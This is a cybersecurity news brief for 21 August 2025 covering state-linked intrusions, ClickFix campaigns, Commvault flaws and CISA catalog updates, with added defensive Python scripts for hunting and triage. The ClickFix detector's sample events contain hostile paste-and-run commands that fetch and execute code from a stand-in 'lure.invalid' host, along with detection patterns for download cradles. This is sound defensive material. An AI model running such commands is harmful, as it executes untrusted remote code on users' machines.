Cybersecurity Brief

Murky Panda Intrusions, ClickFix Attacks, and KEV Updates

Coverage: 21 Aug 2025 (UTC)

Incidents

Activity attributed to a China‑nexus adversary surged, with CrowdStrike detailing MURKY PANDA’s intrusions against government, technology, academic, legal and professional services organizations across North America. The actor exploits internet‑facing appliances, rapidly weaponizes n‑day and zero‑day vulnerabilities (including CVE‑2023‑3519 against Citrix NetScaler), and deploys web shells and a statically linked Golang RAT dubbed CloudedHope. CrowdStrike highlights trusted‑relationship compromises: abuse of SaaS providers and Microsoft cloud solution providers to pivot into downstream tenants, steal Entra ID application registration secrets, authenticate as service principals, and read email. In other cases, delegated administrative privileges and Admin Agent roles were misused to create backdoor accounts and add secrets to service principals. Guidance centers on auditing service principal credentials and activity, enabling Graph activity logs, hunting for anomalous service principal sign‑ins, reviewing Entra sign‑in/session details, auditing cloud solution provider actions and MFA usage, and prioritizing patching of cloud and edge devices.
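The hunting guidance above (audit service principal credentials, look for anomalous service principal sign-ins, review partner/CSP actions) can be turned into a small triage script. The block below is an added example, not code from CrowdStrike's report: it assumes sign-in and directory-audit records have already been exported (for instance via Microsoft Graph or a SIEM) into dicts with the field names shown, and every record in it is constructed sample data. It baselines each service principal's source IPs before a cutoff, flags sign-ins from unseen IPs, flags dormant principals that wake up, flags credential additions by actors outside an allowlist, and then correlates the last two signals, which is the pattern the report describes (a secret added to a service principal, followed by authentication as that principal).

```python
"""Hunt for anomalous Entra ID service principal activity in exported logs.

Added example, not code from CrowdStrike's report. It assumes sign-in and
audit records have already been exported into dicts with the field names
used below; real exports carry many more fields. All records here are
constructed sample data.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed service principal sign-ins (field names follow the Entra
# servicePrincipalSignInLogs shape; values are invented).
SP_SIGNINS = [
    {"appId": "a1", "servicePrincipalName": "backup-svc", "ipAddress": "203.0.113.10", "createdDateTime": "2025-08-01T02:00:00Z"},
    {"appId": "a1", "servicePrincipalName": "backup-svc", "ipAddress": "203.0.113.10", "createdDateTime": "2025-08-10T02:00:00Z"},
    {"appId": "a2", "servicePrincipalName": "mail-reader", "ipAddress": "198.51.100.7", "createdDateTime": "2025-07-01T09:00:00Z"},
    {"appId": "a3", "servicePrincipalName": "ci-runner", "ipAddress": "203.0.113.20", "createdDateTime": "2025-08-12T14:00:00Z"},
    {"appId": "a1", "servicePrincipalName": "backup-svc", "ipAddress": "203.0.113.10", "createdDateTime": "2025-08-20T02:00:00Z"},
    {"appId": "a1", "servicePrincipalName": "backup-svc", "ipAddress": "192.0.2.55", "createdDateTime": "2025-08-20T03:00:00Z"},
    {"appId": "a2", "servicePrincipalName": "mail-reader", "ipAddress": "192.0.2.55", "createdDateTime": "2025-08-20T11:05:00Z"},
    {"appId": "a3", "servicePrincipalName": "ci-runner", "ipAddress": "203.0.113.20", "createdDateTime": "2025-08-21T14:00:00Z"},
]

# Constructed directory audit events for changes to service principals.
AUDIT_EVENTS = [
    {"activityDisplayName": "Add service principal credentials", "initiatedBy": "svc-owner@corp.example", "targetAppId": "a3", "activityDateTime": "2025-08-12T13:00:00Z"},
    {"activityDisplayName": "Add service principal credentials", "initiatedBy": "partner-admin@csp.example", "targetAppId": "a2", "activityDateTime": "2025-08-20T11:00:00Z"},
    {"activityDisplayName": "Update application", "initiatedBy": "svc-owner@corp.example", "targetAppId": "a1", "activityDateTime": "2025-08-19T10:00:00Z"},
]

# Start of the hunting window; everything before it forms the baseline.
CUTOFF = datetime(2025, 8, 15, tzinfo=timezone.utc)
# Identities allowed to add credentials to service principals (assumption).
TRUSTED_CREDENTIAL_ACTORS = {"svc-owner@corp.example"}


def _ts(s):
    """Parse an ISO-8601 UTC timestamp such as 2025-08-20T11:00:00Z."""
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def baseline_ips(signins, cutoff):
    """Map appId -> set of source IPs seen before the cutoff."""
    seen = defaultdict(set)
    for r in signins:
        if _ts(r["createdDateTime"]) < cutoff:
            seen[r["appId"]].add(r["ipAddress"])
    return seen


def new_ip_signins(signins, cutoff):
    """Sign-ins after the cutoff from an IP the principal never used before it."""
    seen = baseline_ips(signins, cutoff)
    return [r for r in signins
            if _ts(r["createdDateTime"]) >= cutoff
            and r["ipAddress"] not in seen[r["appId"]]]


def dormant_reactivations(signins, cutoff, dormant_days=30):
    """App IDs that sign in after the cutoff but were silent for dormant_days before it."""
    last_before = {}
    for r in signins:
        t = _ts(r["createdDateTime"])
        if t < cutoff:
            last_before[r["appId"]] = max(last_before.get(r["appId"], t), t)
    flagged = set()
    for r in signins:
        if _ts(r["createdDateTime"]) >= cutoff:
            prev = last_before.get(r["appId"])
            if prev is None or (cutoff - prev) > timedelta(days=dormant_days):
                flagged.add(r["appId"])
    return sorted(flagged)


def unexpected_credential_adds(events, trusted_actors):
    """Credential additions performed by anyone outside the allowlist."""
    return [e for e in events
            if e["activityDisplayName"] == "Add service principal credentials"
            and e["initiatedBy"] not in trusted_actors]


def hunt(signins, events, cutoff, trusted_actors):
    """Run all checks and correlate 'new secret added' with 'new-IP sign-in'."""
    result = {
        "new_ip_signins": [(r["appId"], r["ipAddress"]) for r in new_ip_signins(signins, cutoff)],
        "dormant_reactivations": dormant_reactivations(signins, cutoff),
        "unexpected_credential_adds": [(e["targetAppId"], e["initiatedBy"])
                                       for e in unexpected_credential_adds(events, trusted_actors)],
    }
    cred_targets = {app for app, _ in result["unexpected_credential_adds"]}
    # Highest-priority finding: a principal that got an unexpected credential
    # and then authenticated from a source never seen before.
    result["credential_then_signin"] = sorted(
        {app for app, _ in result["new_ip_signins"] if app in cred_targets})
    return result


if __name__ == "__main__":
    for k, v in hunt(SP_SIGNINS, AUDIT_EVENTS, CUTOFF, TRUSTED_CREDENTIAL_ACTORS).items():
        print(f"{k}: {v}")
```

In the sample data, mail-reader (a2) is the one to escalate: a partner account added a secret to it, and minutes later it signed in from an address neither it nor any other principal had used. Tune the allowlist and dormancy window to the tenant; in a real hunt, the IP baseline should also cover ASN or named location rather than raw addresses.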

Talos warned that a Russian state‑backed group known as Static Tundra is exploiting long‑standing vulnerabilities in end‑of‑life and unpatched Cisco devices, including the seven‑year‑old CVE‑2018‑0171. The actor installs persistent implants and bespoke SNMP tools for stealthy, long‑term access and data exfiltration. The advisory underscores that age does not diminish risk: organizations running unsupported or unpatched network gear remain exposed and should patch or disable vulnerable features, harden configurations, and monitor for suspicious management activity.

Microsoft reported a marked rise in the ClickFix technique, which convinces users to copy and run attacker‑supplied commands via the Windows Run dialog, PowerShell/Terminal, or macOS workflows after encountering fake CAPTCHAs, browser errors, or spoofed vendor pages. Delivery uses phishing, malvertising, and compromised sites. Observed payloads include infostealers (Lumma, Lampion, AMOS), RATs (Xworm, AsyncRAT, NetSupport, SectopRAT), loaders (Latrodectus, MintsLoader) and modified rootkits, often filelessly via LOLBins such as msbuild.exe, rundll32.exe, and powershell.exe. Microsoft recommends combining awareness with technical controls: restrict Run dialog usage, enforce PowerShell logging and execution policies, apply Group Policy/App Control rules to prevent native binary launches, deploy enterprise‑managed browsers, and enable network/web protections. Microsoft Defender XDR, Defender for Office 365, AMSI, and Cloud Protection provide detections and hunting queries.

The Hacker News highlighted Mandiant’s tracking of UNC5518 using ClickFix lures to deliver CORNFLAKE.V3, a backdoor that adds registry persistence and HTTP‑based delivery of executable, script, and PowerShell payloads, with traffic proxying through Cloudflare tunnels. Observed payloads include an Active Directory reconnaissance utility, a Kerberoasting script, and a C‑language backdoor named WINDYTWIST.SEA capable of relaying TCP traffic, spawning reverse shells, executing commands, and attempting lateral movement. The reporting also describes a parallel USB‑borne campaign since September 2024 that installs components and a C++ backdoor (PUMPBENCH) to fetch XMRig and spread via removable drives. Recommended mitigations include restricting the Run dialog, enforcing strict PowerShell execution policies, enabling script block and robust endpoint logging, hardening Group Policy, adopting managed browsers and safe‑attachment policies, and running regular user‑focused simulations.
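Both ClickFix write-ups above come down to the same observable: a user-launched shell or LOLBin started from the Run dialog or a terminal with a pasted command that hides its window, decodes itself, or fetches and evaluates remote content. The block below is an added example, not code from Microsoft or Mandiant: a scoring detector over process-creation events (Sysmon-style field names; all events are constructed samples) that adds one point for an interactive parent and one per suspicious command-line indicator, so the threshold can be tuned against the environment's own admin tooling.

```python
"""Score process-creation events for the ClickFix paste-and-run pattern.

Added example, not detection content from Microsoft or Mandiant. Events use
Sysmon-style field names (User, ParentImage, Image, CommandLine); every event
below is constructed sample data.
"""
import re

# Interpreters and LOLBins a pasted ClickFix command typically lands in.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "msbuild.exe", "rundll32.exe", "wscript.exe", "cscript.exe"}
# Parents that indicate a human launched the command (Run dialog, Terminal).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "openconsole.exe"}
# Command-line indicators; each match adds one point.
INDICATORS = [
    (r"(?i)-(w|windowstyle)\s+hidden", "hidden window"),
    (r"(?i)-(e|ec|enc|encodedcommand)\b", "encoded command"),
    (r"(?i)\b(iex|invoke-expression)\b", "invoke-expression"),
    (r"(?i)\b(downloadstring|downloadfile|invoke-webrequest|iwr|curl|wget)\b", "download cradle"),
    (r"(?i)https?://", "remote URL"),
]

# Constructed sample events: SCCM-run script, admin in Terminal, a pasted
# ClickFix command, and a pasted mshta launcher.
EVENTS = [
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"User": r"CORP\admin1",
     "ParentImage": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal\WindowsTerminal.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Service"},
    {"User": r"CORP\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iwr http://lure.invalid/v | iex"'},
    {"User": r"CORP\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://lure.invalid/verify.hta"},
]


def _basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    child = _basename(ev["Image"])
    parent = _basename(ev["ParentImage"])
    if child not in SCRIPT_HOSTS:
        return 0, []
    reasons = []
    if parent in INTERACTIVE_PARENTS:
        reasons.append(f"{child} launched from {parent}")
    for pattern, label in INDICATORS:
        if re.search(pattern, ev["CommandLine"]):
            reasons.append(label)
    return len(reasons), reasons


def detect_clickfix(events, threshold=3):
    """Events whose score reaches the threshold, with the reasons for review."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"user": ev["User"], "image": ev["Image"],
                         "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect_clickfix(EVENTS):
        print(hit["user"], hit["score"], "; ".join(hit["reasons"]))
```

With the default threshold of 3 only the pasted PowerShell command fires (interactive parent, hidden window, download cradle, remote URL, Invoke-Expression); the mshta launch scores 2 and is caught only at threshold 2. That gap is deliberate: the threshold is where an analyst trades coverage of bare launchers like mshta against noise from administrators who legitimately run one-liners from a terminal. Pair the rule with PowerShell script block logging so the decoded or downloaded content is available for the alert.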

Unit 42 analyzed exploitation of CVE‑2024‑36401 in GeoServer to deploy SDKs and apps that monetize victims’ internet connections by turning hosts into proxy/shared‑bandwidth nodes. The RCE flaw allows attacker‑controlled JXPath expressions to invoke Java runtime methods across multiple service endpoints, enabling command execution and staged payload retrieval. Operators deployed lightweight stagers and binaries (e.g., z401/z402, a193, d593, z593), used legitimate vendor SDKs without modification, and compiled app binaries in Dart for cross‑platform Linux deployment to reduce detection. Telemetry showed shifting infrastructure and thousands of exposed GeoServer instances across many countries. Recommended steps include applying patches, restricting internet exposure, enforcing access controls and segmentation, blocking known distribution hosts, and instrumenting detections for JXPath/Geotools exploitation patterns.

Kaspersky documented a phishing campaign targeting Ledger hardware wallet users with apology‑style emails that claim fragments of private keys were transmitted to Ledger servers and exfiltrated. Recipients are urged to install an “emergency” firmware update via professionally designed but unaffiliated domains. The sites attempt to harvest wallet seed phrases, granting attackers full control of funds if disclosed. Emails were sent via a legitimate mailing service to improve deliverability, and some sites include functional support chats to increase credibility. Guidance stresses skepticism toward unsolicited update prompts, targeted awareness training, and endpoint/network protections to block phishing sites.

Law enforcement outcomes also featured: KrebsOnSecurity reported a 10‑year federal sentence and roughly $13 million restitution for a member of Scattered Spider linked to SIM‑swapping and social‑engineering campaigns that compromised corporate accounts and siphoned cryptocurrency. The case underscores the sustained risk from vishing, smishing, and credential theft campaigns that target people rather than systems.

Patches

The Hacker News covered watchTowr Labs’ disclosure of four Commvault defects affecting on‑premises versions before 11.36.60: unauthenticated API access (CVE‑2025‑57788), setup‑time default credential exposure (CVE‑2025‑57789), a high‑impact path traversal leading to unauthorized filesystem access and RCE (CVE‑2025‑57790), and insufficient input validation enabling command‑line argument manipulation (CVE‑2025‑57791). Researchers demonstrated pre‑auth exploit chains, including one that requires the built‑in admin password to remain unchanged since installation. Commvault addressed the issues in builds 11.32.102 and 11.36.60 and said its SaaS offering is unaffected. Organizations should prioritize patching, validate that administrative passwords were changed post‑installation, and audit for anomalous API or file‑access activity.

CISA added CVE‑2025‑43300—an out‑of‑bounds write in Apple iOS, iPadOS, and macOS—to the Known Exploited Vulnerabilities Catalog based on evidence of active exploitation. Under BOD 22‑01, Federal Civilian Executive Branch agencies must remediate KEV entries by due dates; CISA urges all organizations to prioritize fixes and mitigations, verify exposure, and implement compensating controls while deploying vendor updates.
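The KEV workflow CISA describes (verify exposure, remediate by the due date) is easiest to operationalize by joining the catalog feed against scanner findings. The block below is an added example, not CISA tooling: it embeds a constructed slice of the KEV JSON shape (the real feed is published at https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json and can be loaded with the same function), using the CVEs named in this brief but with due dates and ransomware flags that are sample values rather than the catalog's, and it joins them against a constructed scanner export to produce a deadline-ordered remediation list.

```python
"""Join CISA KEV catalog entries against vulnerability-scanner findings.

Added example, not CISA tooling. KEV_FEED mirrors the catalog's JSON layout
(vulnerabilities[] with cveID, vendorProject, product, dateAdded, dueDate,
knownRansomwareCampaignUse, requiredAction) but its dates and flags are
constructed sample values, not the catalog's.
"""
import json
from datetime import date

KEV_FEED = {
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "constructed-sample",
    "vulnerabilities": [
        {"cveID": "CVE-2025-43300", "vendorProject": "Apple", "product": "Multiple Products",
         "dateAdded": "2025-08-21", "dueDate": "2025-09-11",  # dueDate constructed
         "knownRansomwareCampaignUse": "Unknown", "requiredAction": "Apply vendor updates."},
        {"cveID": "CVE-2023-3519", "vendorProject": "Citrix", "product": "NetScaler ADC and Gateway",
         "dateAdded": "2023-07-19", "dueDate": "2023-08-09",
         "knownRansomwareCampaignUse": "Known", "requiredAction": "Apply vendor updates."},
        {"cveID": "CVE-2018-0171", "vendorProject": "Cisco", "product": "IOS and IOS XE",
         "dateAdded": "2021-11-03", "dueDate": "2022-05-03",
         "knownRansomwareCampaignUse": "Unknown", "requiredAction": "Apply vendor updates."},
        {"cveID": "CVE-2024-36401", "vendorProject": "OSGeo", "product": "GeoServer",
         "dateAdded": "2024-07-15", "dueDate": "2024-08-05",
         "knownRansomwareCampaignUse": "Unknown", "requiredAction": "Apply vendor updates."},
    ],
}

# Constructed scanner export: one row per (asset, CVE) finding.
FINDINGS = [
    {"asset": "netscaler-gw-01", "cveID": "CVE-2023-3519"},
    {"asset": "core-sw-07", "cveID": "CVE-2018-0171"},
    {"asset": "gis-app-02", "cveID": "CVE-2024-36401"},
    {"asset": "exec-iphone-14", "cveID": "CVE-2025-43300"},
    {"asset": "web-app-03", "cveID": "CVE-2099-0001"},  # not in KEV: stays in normal patching
]


def load_feed(path):
    """Load a downloaded copy of the KEV JSON feed from disk."""
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def kev_index(feed):
    """Map cveID -> catalog entry for O(1) lookups."""
    return {v["cveID"]: v for v in feed["vulnerabilities"]}


def triage(findings, feed, today):
    """Findings that are in KEV, annotated with deadline state, soonest due first."""
    index = kev_index(feed)
    rows = []
    for f in findings:
        entry = index.get(f["cveID"])
        if entry is None:
            continue
        due = date.fromisoformat(entry["dueDate"])
        rows.append({
            "asset": f["asset"],
            "cveID": f["cveID"],
            "vendorProject": entry["vendorProject"],
            "dueDate": entry["dueDate"],
            "daysUntilDue": (due - today).days,  # negative when overdue
            "overdue": due < today,
            "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
            "requiredAction": entry["requiredAction"],
        })
    rows.sort(key=lambda r: r["daysUntilDue"])
    return rows


def summarize(rows):
    """Counts a reporting dashboard would show."""
    return {
        "kev_findings": len(rows),
        "overdue": sum(1 for r in rows if r["overdue"]),
        "ransomware_linked": sum(1 for r in rows if r["ransomware"]),
    }


if __name__ == "__main__":
    rows = triage(FINDINGS, KEV_FEED, date(2025, 8, 22))
    for r in rows:
        state = "OVERDUE" if r["overdue"] else f"due in {r['daysUntilDue']}d"
        print(f"{r['asset']:16} {r['cveID']:15} {state:12} ransomware={r['ransomware']}")
    print(summarize(rows))
```

Run against the real feed, replace KEV_FEED with load_feed("known_exploited_vulnerabilities.json") and FINDINGS with the scanner's export. Note the overdue rows: KEV deadlines are binding for FCEB agencies under BOD 22-01 but the ordering is just as useful for anyone else, because an entry that is years past its due date (the Cisco Smart Install bug Static Tundra is still exploiting is the case in point) is exactly the kind of exposure the Talos advisory warns about.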

CISA also issued ICSA‑25‑233‑01 for Mitsubishi Electric MELSEC iQ‑F Series CPU modules, describing a DoS vulnerability (CVE‑2025‑5514) in the web server due to improper handling of length parameter inconsistencies. Mitsubishi Electric does not plan a fixed firmware release; mitigations include restricting network exposure, using firewalls/VPNs, employing IP filters, operating within trusted LANs, and limiting physical access. CISA advises isolating control networks and avoiding direct internet exposure.

Separately, CISA published ICSMA‑25‑233‑01 for FUJIFILM Healthcare Americas Synapse Mobility, noting a privilege‑escalation flaw (CVE‑2025‑54551) stemming from external control of an assumed‑immutable web parameter. Versions prior to 8.2 are affected; patches exist for 8.0–8.1.1 and 8.2+ resolves the issue. Recommended actions include upgrading, disabling certain configurator functions to force SecureURL, minimizing network exposure, and using secure, updated remote access.

Platforms

Following mass exploitation of SharePoint flaws in July, The Register reported changes to the Microsoft Active Protections Program (MAPP): proof‑of‑concept exploit code will no longer be shared with firms in countries that must report vulnerabilities to their governments. Those participants will receive general written descriptions alongside patches. The shift aims to reduce the risk of pre‑release technical details fueling large‑scale exploitation while balancing the need for timely defensive information.

AWS introduced native integrations between AWS Security Incident Response and IT service management platforms, initially Jira and ServiceNow. The open‑source connectors support bidirectional sync of issues, comments, and attachments, allowing teams to preserve existing ticketing and escalation paths while centralizing incident data. AWS recommends validating data mapping, access control, and auditing requirements before production rollout.

In a separate update, AWS announced customer‑managed key support in AWS IoT Core via AWS KMS. Customers can encrypt stored IoT Core data with keys they control; AWS will automatically re‑encrypt existing data during opt‑in. The change increases control over key lifecycle, rotation, and monitoring, aligning with internal policy and regulatory needs. Proper KMS key policies, IAM permissions, and logging remain customer responsibilities.

Research and policy

The Hacker News summarized Picus Security’s Blue Report 2025, which analyzed more than 160 million simulated attacks and found credential‑based intrusions remain dominant. Password cracking succeeded in 46% of tested environments, and Valid Accounts (T1078) attacks succeeded in 98%, indicating weak password hygiene, legacy hashing, and incomplete MFA adoption. The report recommends stronger password policies, eliminating outdated hashing, broad MFA rollout, routine validation of credential defenses, identity‑centric anomaly detection, and outbound traffic inspection to reduce data‑exfiltration risk.

The Hacker News also covered IBM X‑Force research into QuirkyLoader, a .NET loader delivered via spam archives that uses DLL side‑loading and process hollowing to inject payloads into commonly abused processes. Observed payloads include Agent Tesla, AsyncRAT, Formbook, Masslogger, Remcos, Rhadamanthys, and Snake Keylogger. Limited campaigns in July 2025 targeted users in Taiwan and Mexico. Analysts note ahead‑of‑time compilation complicates detection and analysis, and the findings track broader phishing evolutions aiding credential theft and account takeover.

These and other news items from the day:

Thu, August 21, 2025

MURKY PANDA: Trusted-Relationship Cloud Threats and TTPs

🔒 Since late 2024 CrowdStrike's Counter Adversary Operations has tracked MURKY PANDA, a China‑nexus actor targeting government, technology, academic, legal and professional services in North America. The group exploits internet‑facing appliances, rapidly weaponizes n‑day and zero‑day flaws, and deploys web shells (including Neo‑reGeorg) and the Golang RAT CloudedHope. CrowdStrike recommends auditing Entra ID service principals and activity, enabling Microsoft Graph logging, hunting for anomalous service principal sign‑ins, prioritizing patching of cloud and edge devices, and leveraging Falcon detection and SIEM capabilities.

Thu, August 21, 2025

Russian State-Backed Static Tundra Exploits Cisco Devices

🧭 The author opens with a travel anecdote and practical reminders on securing devices while on the road, urging readers to update, back up, and avoid public charging or untrusted Wi‑Fi. The newsletter highlights field-tested precautions including disabling auto-connect, using VPNs or phone hotspots, enabling device tracking, and carrying power banks. It also warns of an active campaign by a Russian state-backed group targeting Cisco devices via CVE-2018-0171, urging immediate patching and hardening.

Thu, August 21, 2025

Pre-auth Exploit Chains Found in Commvault Releases

🔒 Commvault has released fixes for four vulnerabilities in versions prior to 11.36.60 that could enable unauthenticated attackers to achieve remote code execution. The flaws include an unauthenticated API access bug, a setup-time default credential exposure, a path traversal allowing filesystem access, and command-line argument injection that can elevate low-privilege sessions. Patches are available in 11.32.102 and 11.36.60; Commvault SaaS is not affected.

Thu, August 21, 2025

Analyzing ClickFix: A Rising Click-to-Execute Threat

🛡️ Microsoft Threat Intelligence and Microsoft Defender Experts describe the ClickFix social engineering technique, where attackers trick users into copying and pasting commands that execute malicious payloads. Observed since early 2024 and active through 2025, these campaigns deliver infostealers, RATs, loaders, and rootkits that target Windows and macOS devices. Lures arrive via phishing, malvertising, and compromised sites and often impersonate legitimate services or CAPTCHA verifications. Organizations should rely on user education, device hardening, and Microsoft Defender XDR layered protections to detect and block ClickFix activity.

Thu, August 21, 2025

ClickFix Campaign Delivers CORNFLAKE.V3 Backdoor via Web

🛡️ Mandiant observed a campaign using the ClickFix social‑engineering lure to trick victims into copying and running PowerShell commands via the Windows Run dialog, yielding initial access tracked as UNC5518. That access is monetized and used by other groups to deploy a versatile backdoor, CORNFLAKE.V3, in PHP and JavaScript forms. CORNFLAKE.V3 supports HTTP-based payload execution, Cloudflare-tunneled proxying and registry persistence; researchers recommend disabling Run where possible, tightening PowerShell policies and increasing logging and user training to mitigate the risk.

Thu, August 21, 2025

Weak Passwords Fuel Rise in Compromised Accounts in 2025

🔐 The Picus Blue Report 2025 finds that password cracking succeeded in 46% of tested environments, while Valid Accounts (T1078) exploitation achieved a 98% success rate. Many organizations still rely on weak passwords, outdated hashing, and lax internal controls, leaving credential stores exposed. The report urges adoption of widespread MFA, stronger password policies, routine credential-validation simulations, and improved behavioral detection to reduce undetected lateral movement and data theft.

Thu, August 21, 2025

Threat Actors Abuse SDKs to Sell Victim Bandwidth Stealthily

🔍 Unit 42 observed a campaign exploiting CVE-2024-36401 in GeoServer to remotely deploy legitimate SDKs or apps that sell victims' internet bandwidth. The attackers leverage JXPath evaluation to achieve RCE across multiple GeoServer endpoints, then install lightweight binaries that operate quietly to monetize unused network capacity. This approach often uses unmodified vendor SDKs to maximize stealth and persistence while avoiding traditional malware indicators.

Thu, August 21, 2025

Microsoft restricts Chinese firms' early MAPP exploit access

🔒 Microsoft has restricted distribution of proof-of-concept exploit code to MAPP participants in countries where firms must report vulnerabilities to their governments, including China. Affected companies will receive a more general written description issued at the same time as patches rather than PoC code, Microsoft said. The change follows the late-July SharePoint zero-day attacks and concerns about a possible leak from the early-bug-notification program.

Thu, August 21, 2025

QuirkyLoader Deploys Agent Tesla, AsyncRAT and Keyloggers

🛡️ Researchers disclosed a new .NET-based DLL loader named QuirkyLoader that's been used since November 2024 to deliver information stealers, keyloggers and RATs via email spam. IBM X-Force says attackers send malicious archives from both legitimate providers and self-hosted servers; each archive contains a DLL, an encrypted payload and a real executable used for DLL side-loading. The loader uses process hollowing to inject decrypted payloads into AddInProcess32.exe, InstallUtil.exe or aspnet_wp.exe. Operators compile the .NET DLL with ahead-of-time (AOT) compilation so the resulting binary resembles native C/C++ code and is harder to attribute.

Thu, August 21, 2025

CISA Adds Apple iOS/iPadOS/macOS KEV: CVE-2025-43300

⚠️ CISA added CVE-2025-43300 to its Known Exploited Vulnerabilities (KEV) Catalog, identifying an out‑of‑bounds write in Apple iOS, iPadOS, and macOS that the agency says is under active exploitation. Under BOD 22-01, Federal Civilian Executive Branch agencies must remediate KEV entries by established deadlines, and CISA strongly urges all organizations to prioritize timely patching and mitigation. This vulnerability reflects a common and high-risk memory-corruption vector that can enable code execution or other severe impacts if exploited. CISA will continue to update the KEV Catalog as new evidence of exploitation emerges.

Thu, August 21, 2025

SIM-Swapper Scattered Spider Hacker Sentenced 10 Years

🔒 A 20-year-old Florida man, Noah Michael Urban, was sentenced to 10 years in federal prison and ordered to pay about $13 million in restitution after pleading guilty to wire fraud and conspiracy. Prosecutors say Urban acted with members of Scattered Spider, using SIM-swapping and SMS phishing to divert calls and one-time codes and to phish employees into fake Okta pages. The campaign compromised access at more than 130 firms and enabled thefts of proprietary data and millions in cryptocurrency.

Thu, August 21, 2025

CISA Releases Three Industrial Control Systems Advisories

🔔 CISA released three Industrial Control Systems (ICS) advisories on August 21, 2025, detailing vulnerabilities and potential exploits affecting products from Mitsubishi Electric and FUJIFILM. The notices cover MELSEC iQ-F Series CPU Module, Mitsubishi Electric air conditioning systems (Update A), and Synapse Mobility. Each advisory includes technical details and recommended mitigations. CISA urges administrators and asset owners to review and apply the guidance promptly.

Thu, August 21, 2025

Phishing Campaign Targets Ledger Users with Fake Update

🔒 A sophisticated phishing campaign impersonating Ledger targets Nano X and Nano S Plus users with an urgent fake firmware update notice. The email claims fragments of private keys were leaked and urges immediate action, but the sender and update domains are not affiliated with Ledger. A professionally designed scam site hosted on an unrelated domain uses a support chat to coax victims into entering their seed phrase, which grants full wallet access. Organizations and individuals should treat unsolicited firmware alerts cautiously and use trained security controls and awareness to avoid compromise.

Thu, August 21, 2025

Scattered Spider Member Sentenced to 10 Years in US

🔒 Noah Michael Urban, a 20-year-old member of the Scattered Spider cybercrime gang, was sentenced to 120 months in federal prison after pleading guilty to wire fraud and aggravated identity theft in April 2025. The court also ordered $13 million in restitution and three years of supervised release; Urban called the sentence unjust. Prosecutors say Urban and co-conspirators used SIM swapping and social engineering between August 2022 and March 2023 to steal at least $800,000 and hijack cryptocurrency accounts. His case is part of broader DoJ actions against Scattered Spider as the group forges alliances with other criminal collectives.

Thu, August 21, 2025

AWS Security Incident Response Adds ITSM Integrations

🛡️ AWS Security Incident Response now integrates with popular ITSM platforms like Jira and ServiceNow, offering bidirectional synchronization for issues, comments, attachments, and case updates. The connectors are provided as open-source projects on GitHub with sample code, deployment instructions, and implementation best practices. A modular design and technical documentation make it straightforward to extend support to additional ITSM targets and to leverage AI assistants for rapid customization.

Thu, August 21, 2025

Amazon Verified Permissions adds Cedar 4.5 support

🔒 Amazon Verified Permissions now supports Cedar 4.5, introducing the new “is” operator to enable type-based access checks. Developers can write policies that grant or deny access based on a resource’s declared type—for example, allowing administrators to view a resource only when it is an invoice in a petstore app. The update enhances Cedar’s type system, helps catch type-related errors earlier in policy development, and is available in all AWS Regions where the service runs; new and backward-compatible accounts have been automatically upgraded.

Thu, August 21, 2025

AWS Neuron SDK 2.25: Inference and Monitoring Enhancements

🚀 AWS has released Neuron SDK 2.25.0, now generally available for Inferentia and Trainium instances, adding context and data parallelism support plus chunked attention to accelerate long-sequence inference. The update enhances neuron-ls and neuron-monitor APIs to show node affinities and device utilization, and introduces automatic aliasing (Beta) and disaggregated serving improvements (Beta). Upgraded AMIs and Deep Learning Containers are provided for inference and training.

Thu, August 21, 2025

AWS VPC IPAM Console Adds CloudWatch Alarm Management

🔔 Amazon Web Services has enhanced Amazon VPC IP Address Manager (IPAM) with deeper Amazon CloudWatch alarm integration, bringing alarm visibility and management directly into the IPAM console. Alarms are now visible across IPAM pages and a new resource-level Alarms tab lists alerts associated with specific IPAM resources. You can create alarms from the console (which redirects to CloudWatch with relevant fields pre-populated) and receive proactive monitoring suggestions for resources without alarms. The feature is available in all Regions where IPAM is supported, including AWS China and AWS GovCloud (US).

Thu, August 21, 2025

CloudWatch adds regional support for natural language queries

🔍 Amazon CloudWatch Logs Insights now extends its natural language query result summarization to 15 additional AWS Regions, delivering AI-generated, concise descriptions of query outputs to speed troubleshooting. Additionally, natural language query generation is available in six more Regions for CloudWatch Logs Insights and Metrics Insights, while PPL and SQL query generation has been added in three Regions. These features let users express intent in plain English to produce queries and receive readable summaries without deep query-language expertise, reducing time to actionable insight.

Thu, August 21, 2025

CloudGuard WAFaaS Now Available on AWS Marketplace

🔒 CloudGuard WAF-as-a-Service is now available on the AWS Marketplace and verified as Deployed on AWS. This pay-as-you-go service simplifies web application and API protection for AWS customers and reduces procurement friction. The offering has been recognized in the Gartner Market Guide for WAAP and named a Leader in the GigaOm Radar. Independent testing reported a 99.4% threat detection rate and 0.81% false positives, underscoring strong efficacy with low noise.

Thu, August 21, 2025

Mitsubishi MELSEC iQ-F CPU Module Denial-of-Service

